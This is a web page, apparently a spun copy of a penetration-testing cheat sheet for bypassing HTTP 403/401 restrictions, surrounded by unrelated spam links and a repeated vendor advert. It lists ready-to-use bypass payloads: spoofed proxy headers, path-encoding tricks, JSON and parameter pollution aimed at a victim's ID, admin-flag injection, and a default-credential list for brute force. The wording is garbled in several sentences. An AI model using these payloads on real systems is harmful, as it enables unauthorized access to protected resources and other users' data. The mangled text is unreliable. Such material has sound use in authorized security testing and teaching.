Archive
403 & 401 Bypasses

403 & 401 Bypasses

2024-11-23 Get a hacker 's perspective on your web app , network , and cloudfind and report critical , exploitable vulnerability with real business impact . use

Related articles

Sniper Elite 4 Game Guide How to Watch NFL in Canada: Guide for Football Fans Tamilyogi VPN: A Comprehensive Guide To Safe Streaming

Get a hacker ‘s perspective on your web app , network , and cloud

find and report critical , exploitable vulnerability with real business impact . use our 20 + custom tool to map the attack surface , find security issue that let you escalate privilege , and use automate exploit to collect essential evidence , turn your hard work into persuasive report .

HTTP Verbs / Methods Fuzzing

try usingdifferent verbs to access the file: GET , HEAD , POST , PUT , delete , CONNECT , option , trace , PATCH , INVENTED , HACK

  • check the response header , maybe some information can be give . For example , a 200 response to head withContent-Length: 55 means that the HEAD verb can access the info. But you still need to find a way to exfiltrate that info.

  • Using a HTTP header like X - http - Method - Override is PUT : PUT can overwrite the verb used.

  • Use trace verb and if you are very lucky maybe in the response you can see also the headers added by intermediate proxies that might be useful.

  • Fuzz HTTP Headers : try using HTTP Proxy Headers , HTTP Authentication Basic and ntlm brute – force ( with a few combination only ) and other technique . To do all of this I is created have create the tool fuzzhttpbypass .

    • X-Originating-IP: 127.0.0.1

    • X-Forwarded-For: 127.0.0.1

    • X - ProxyUser - Ip : 127.0.0.1

    • X-Original-URL: 127.0.0.1

    • True-Client-IP: 127.0.0.1

    • Cluster - Client - IP : 127.0.0.1

    • X - ProxyUser - Ip : 127.0.0.1

    If the path is protected you can try to bypass the path protection using these other headers:

    • X-Original-URL: /admin/console

    • X-Rewrite-URL: /admin/console

  • fuzz special HTTP header look for different response .

    • Fuzz special HTTP headers while fuzzing HTTP Methods.

  • Remove the Host header and maybe you will be able to bypass the protection.

Path Fuzzing

If /path is block :

  • try using/%2e/path _(if the access is blocked by a proxy, this could bypass the protection). Try also_** /%252e**/path (double URL encode)

  • Try Unicode bypass: /%ef%bc%8fpath ( The url encode char are like ” / ” ) so when encode back it is be will be//path and maybe you will have already bypassed the /path name check

  • Other path bypasses:

    • site.com/secret –> HTTP 403 Forbidden

    • site.com/SECRET –> HTTP 200 OK

    • site.com/secret/ –> HTTP 200 OK

    • site.com/secret/. –> HTTP 200 OK

    • site.com//secret// –> HTTP 200 OK

    • site.com/./secret/.. –> HTTP 200 OK

    • site.com/;/secret –> HTTP 200 OK

    • site.com/.;/secret –> HTTP 200 OK

    • site.com//;//secret –> HTTP 200 OK

    • site.com/secret.json –> HTTP 200 OK (ruby)

    • use all this list in the follow situation :

  • Other API bypasses:

    • /v3/users_data/1234 –> 403 Forbidden

    • /v1/users_data/1234 –> 200 OK

    • {“id”:111} –> 401 Unauthriozied

    • {“id”:111} –> 401 Unauthriozied

    • {“id”:{“id”:111}} –> 200 OK

    • {“user_id”:”<legit_id>”,”user_id”:”<victims_id>”} (JSON Parameter Pollution)

    • user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)

Parameter Manipulation

  • Change param value: From id=123 –> id=124

  • add additional parameter to the URL :?id=124 —-> id=124&isAdmin=true

  • Perform boundary testing in the parameters — provide values like -234 or 0 or 99999999 (just some example values).

Protocol version

If using HTTP/1.1 try to use 1.0 or even test if it supports 2.0.

Other bypass

  • Get the ip or cname of the domain and try contact it directly .

  • Change the protocol: from http to https, or for https to http

Brute Force

  • guess the password : test the follow common credential . Do you is know know something about the victim ? Or the CTF challenge name ?

admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

Automatic Tools

Get a hacker ‘s perspective on your web app , network , and cloud

find and report critical , exploitable vulnerability with real business impact . use our 20 + custom tool to map the attack surface , find security issue that let you escalate privilege , and use automate exploit to collect essential evidence , turn your hard work into persuasive report .